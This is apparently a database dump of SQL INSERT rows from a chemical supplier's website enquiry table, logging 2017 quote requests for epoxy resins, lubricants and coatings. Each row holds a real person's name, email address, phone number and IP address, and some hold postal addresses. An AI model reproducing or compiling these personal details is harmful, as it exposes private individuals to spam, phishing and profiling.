INSERT INTO `wp_enquiry_detail_new` VALUES (1162, 'Greg Swain', 'swain@chemistry.msu.edu', 'Quote for one quart of the EPON 828 resin. Is this ready to use or is there a second component that must be mixed? What are the recommended curing conditions?', '', '', '35.10.50.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 16:00:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1163, 'Kathleen Long Devol', 'kathleen.l.devol@nasa.gov', 'Could I get a quote for:\nEpon Resin 828 and Epicure 3223.\nThanks. Kathy.', '757864-1125', 'Quote', '146.165.128.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 16:03:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1164, 'Kirti', 'kirtibiotech18@gmail.com', 'Can you please provide me quote for EPON 828, a small package?', '734680-6559', 'Quote for EPON 828', '35.22.5.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 16:04:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1165, 'David Platts', 'platts@lanl.gov', 'Can you give me a price on a gallon of Epon 815C Epoxy Resin?', '505667-6589', 'Epon 815C Epoxy Resin', '192.12.184.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 17:55:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1166, 'Jason Little', 'jlittle@distron.com', 'Looking for pricing on the 14oz bottles?', '508695-8786', 'Quote request', '74.94.140.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:37:"MS-460H | Silicone Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 17:55:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1167, 'Sam Scott', 'sscott@gsoptics.com', 'Hello,\n\nPlease provide pricing for up to (5) 2oz tubes or the smallest size you offer.  \n\nThanks.', '585295-0227', 'Krytox XHT-BDX Quote', '50.49.250.81', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"697";s:5:"title";s:7:"XHT-BDX";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_105938183.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 19:32:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1168, 'Enrique Mendoza', 'sanantoniohub@gmail.com', 'please send me quote ', '210399-5886', 'resin 1 gallon', '76.204.29.191', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-29 21:28:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1169, 'Susan Deily', 'sdeily@rdaltanova.com', 'Please quote for 1 kit of MS-907.\nSue Deily', '610443-2299', 'quote for ms-907', '216.164.174.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:3:"224";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-30 11:53:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1170, 'Michael Becherer', 'mbecherere@mantzautomation.com', 'One of our customers requires this grease used on their molds, What is the price per 8oz tube? Do you have any discounts for a higher quantity ordered? Does this grease come in a different size tube or container?', '262673-7560', 'Quote For Grease', '207.10.37.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-30 13:46:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1171, 'MATT BAKER', 'mbaker@djgrp.com', 'Please price quote with lead time or provide distributor info.\n\nThank you,\nMatt Baker \nTooling Planner\nD-J Engineering Augusta, Ks. ', '316775-1212', 'price quote with lead time for EPON828 Qt size', '70.164.201.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-30 18:47:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1172, 'MATT BAKER', 'mbaker@djgrp.com', 'please price quote with leadtime or provide distributor info.\n\nThank you,\nMatt Baker\nTooling Planner \nD-J Engineering Augusta, Ks.', '316775-1212', 'price quote with leadtime qt kit', '70.164.201.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-30 18:50:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1173, 'Amal', 'acct@endocorpusa.com', 'Hello,\n\nI need to order (10) GPL 205 if available.\n\nThank you', '248223-9900', 'GPL 205', '173.167.26.113', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-30 18:51:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1174, 'Lahoma Jones', 'ljones@pivotint.com', 'Please provide pricing for 12 cans.\nWe need to order today.\nThanks!', '913312-6900', 'MS-460H', '23.228.141.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:37:"MS-460H | Silicone Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-30 20:12:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1175, 'Semih Cetindag', 'semih.cetindag@rutgers.edu', 'I would like to get a Quote for EPIN 828 Resin. The application will be an enclosure in water environment (fuel cell). Also is the product compatible after cured in base/acid environment? Could you send me a small amount for a quick try? \n\nThank you.', '908727-2286', 'Quote for EPIN 828 Resin', '165.230.225.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-01 04:30:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1176, 'Patrick Prendergast', 'pup@deako.com', 'We\'re looking for guidance for our application:\n1. Dry, indoor environment, protection from foreign substances\n2. Need to pass 3kV hipot with ~1.2mm spacings.\n3. Would like to do a spray-on application with room-temp cure', '425984-4708', 'Looking for guidance', '66.165.29.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"621";s:5:"title";s:36:"MS-475C | Acrylic Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:3:"200";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-475C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-01 04:37:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1177, 'Plansky Hoang', 'phoang@syr.edu', 'Hello, I would like a price quote for the 1 kg Krytox 1525 vacuum pump oil. ', '315396-8653', 'Price quote', '184.153.242.231', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"954";s:5:"title";s:8:"VPF 1525";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_373295623.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-01 12:39:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1178, 'Thomas Yoder', 'yoder@smicomposites.com', 'Looking for a Quote for the following.\n-Quart size container with C of C\'s.', '706247-4806', 'Quote for Epikure 3234', '208.85.193.19', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-01 18:05:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1179, 'Ed Eroh', 'k3va@ptd.net', 'Used M-S chemicals at my last work place and they where the best.\nWould like to buy 12 cans of the Ms-222n if I can.\nThanks,\nE.Eroh \nDaniielsville Pa ', '484515-0465', 'price quote', '24.115.94.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-02 14:51:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1180, 'li', '404337514@qq.com', 'hi,\ni want to know how much for one bottle, and how many days i can receive it?\nThx', '1580-658-0818', '', '116.6.49.110', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-03 03:23:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1181, 'Maria Briuglia', 'maria.briuglia@strath.ac.uk', 'Hi,\n\nI am interested on buying GPL 106 to perform some lab experiments for crystal nucleation.\nCan I get the quotations?\n\nBest regards,\nMaria Briuglia', '', 'Request of quotation', '130.159.92.43', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"441";s:5:"title";s:7:"GPL 106";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease-pfpe.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-03 13:38:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1182, 'Aaron Forster', 'aaron.forster@nist.gov', 'Can I please get a quote for 2 gallons of epon 862 and 2 quarts of cure agent W.', '301975-8701', 'epoxy 862 and Cure agent W quotes', '129.6.68.123', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-03 17:23:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1183, 'Doug Harvey', 'dharvey@aosense.com', 'Hello, we would like to purchase one quart of the epoxy dissolver.  1 Quart', '408735-9500', 'Request for quote', '198.91.106.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-03 17:58:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1184, 'Richard Fetter', 'richard.fetter@gmail.com', 'I have previously purchased PTFE Release Agent Dry Lubricant MS-122AD from Miller-Stephenson.  My supply of 4 cans is just about exhausted so I need to re-order.  Please send me a quote and any additional information necessary to order 4 14 oz cans.  This is the quantity I ordered previously.  This is a personal purchase, not through a company so I will pay be credit card.\n\nThank you', '510919-2220', 'Need to purchase some MS-122AD', '73.162.32.87', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-04 20:50:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1185, 'Charlene', 'cpleung@sri.utoronto.ca', 'To Whom It May Concern, I\'m interested to learn more about the TriboSys medical lubricant. Would you be able to send me a datasheet or any technical information on the product? I could not find this information or any documents on the webpage. Thank you in advance.', '', 'Data Sheet for TriboSys', '142.76.25.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-04 21:11:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1186, 'Joji Morita', 'h-kurosaka@smart-vision.co.jp', 'Please quote accordingly.\n\nNOMENCLATURE  MS-143XD\nSIZE  1L or 1QT\nQTY  2\n\nI am a vendor for the JMoD (Japan Ministry of Defense).  I would require product be shipped direct to my office via FedEx/DHL collect.\n\nSincerely,\nJoji Morita\nDirector\nKUROSAKA CORPORATION\nWATANABE BLDG. 2F\n1-27-7 KANDAJINNBO-CHO\nCHIYODA-KU, TOKYO 101-0051 JAPAN\nTEL +81-3-3291-0016\nFAX +81-3-3291-0015', '+810332210320', 'RFQ -- MS-143XD', '210.174.10.248', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:38:"MS-143XD | Dry Film Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 03:44:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1187, 'rahul ghusalkar', 'rahulg@amphenol-in.com', 'Dear sir,\n\nI have requirement of MS-122.\nfor more details kindly reply to mail given or contact.\n\nRequirement is urgent \n\nThanks &amp; regards\nRahul Ghusalkar\nProcess Engineering dept.\nAmphenol India (AIMS Division)\n105, Bhosari Industrial Area\nPUNE, INDIA – 411 026\nTel : +91 (0)20 67360437\nMob: +91 9168703555\nMail : rahulg@amphenol-in.com\n', '916870-3555', 'Requirement of MS-122', '14.141.107.198', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 04:27:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1188, 'Mike Buy', 'mbuy@robnor.co.uk', 'Please can I have price for small lots up to drum', '+4401793823741', 'TEPA', '185.15.207.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1187";s:5:"title";s:15:"EPIKURE™ 3245";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3245.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 12:06:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1189, 'Gloria Morales', 'gloria.m.morales.civ@mail.mil', 'Need a quote for Vertrel XF 5 gallons container. ', '410436-4674', 'Quote for Vertrel  ', '131.92.45.237', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 13:33:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1190, 'Jonathan Evans', 'jonathan.evans@varian.com', 'I\'m interested in a quote for a 0.5 kg jar of Krytox XP 2A7.\n\nThanks,\n\nJon', '', 'Quote for XP 2A7', '132.190.92.85', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1016";s:5:"title";s:6:"XP 2A7";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-grease234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 15:24:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1191, 'Callena Spearman', 'callena.spearman@pelican-sales.com', 'Good afternoon,\n\nCan you please provide pricing and availability for this item? Also, do you accept a shipping account for orders? If not, please quote shipping to 32940.\n\nThank you!\nCallena Spearman\nAccount Manager\nSDB, WOSB Small Business\n2825 Business Center Boulevard\nSuite C9\nMelbourne, FL  32940\nMain: (321) 254-9569 x 663\nFax: (321) 255-1133\nEmail: callena.spearman@pelican-sales.com\nWeb: www.pelican-direct.com\n', '321254-9569', 'Quote Request', '97.68.25.162', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 21:17:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1192, 'Mark Reynolds', 'mreynolds@mriglobal.org', 'Hello,\nI would like pricing and lead time for (1) tube of Krytox XHT-BDZ. \nThanks', '816360-5481', 'QUOTE', '4.14.49.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 22:32:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1193, 'Yi Liu', 'liuy@quakerchem.com', 'Hi \n\nThis is Yi Liu from Quaker Chemical. Can I have a quotation for two bottles of MS-122AD Dry film PTFE release agent (13.5oz). Do you also have large size available? \n\nThanks,\nYi', '626782-2256', 'Quotation for two 13.5 oz bottle', '67.203.138.173', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-05 22:58:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1194, 'Kurt Miller', 'kurt.d.miller@navy.mil', 'Good morning,\nI am looking to get a price quote on a gallon jug of Vertrel XF.\nThank you,\n-Kurt', '', 'Vertrel XF', '138.162.0.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 11:35:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1195, 'DESCAMPS', 'rdi@rdifrance.com', 'Dear,\n\nPlease can you send us a quote with your best price and price transport MONTROUGE (92120) for:\n\nQTE 01 BOX MS-260 Safe zone cleaner\n\nBest regards.\n \nSincères salutations.\nMarie-Laure\nP/O Mr DESCAMPS Raphaël\n\n \n9, rue Corneille\n92120 MONTROUGE\nT. 33 1 46 57 80 80\nGsm 33 6 74 29 11 05\nF. 33 1 46 57 80 54\n@ rdi@rdifrance.com \n \n\n', '', 'DDP RDI 17/2272', '94.143.81.186', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 12:11:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1196, 'lori', 'lori.fitzgerald@mts.com', 'How do I order the product for the following: MS-114D', '', 'MS-114D', '148.150.1.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"623";s:5:"title";s:36:"MS-114D | Conformal Coating Stripper";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-114C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 14:48:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1197, 'John Hartmann', 'john.hartmann@evonik.com', 'Please let me know the availability and  estimated delivery time for Epon 828. Quatntity needed is 140 kg total or 7 X 20kg containers. Please let me know if there are other options for size. This is shipping to  our facility: Evonik Corporation 7201 Hamilton Blvd. Dock #6 Allentown PA 18195.Our customer # is 2947860. I will place the order once I review the quote.  ', '609432-8361', 'Epon 828 ', '208.60.60.254', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"7";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 15:51:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1198, 'igal golan', 'golanigal@yahoo.com', 'want to by one  . can you indicate were i can find the item in israel, or can you send me one ?', '', 'epoxy 907 adhesive system 2 part', '84.94.73.29', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 16:34:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1199, 'Cari Salvatore', 'cari.salvatore@annapmicro.com', 'Please provide a quote for qty 1 of XHT-BDZ &amp; provide MSDS if possible.\n\nThank you!', '410841-2514', 'RFQ', '71.121.147.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-06 18:43:03', '', NULL, '', '', '', NULL, '', ''); 
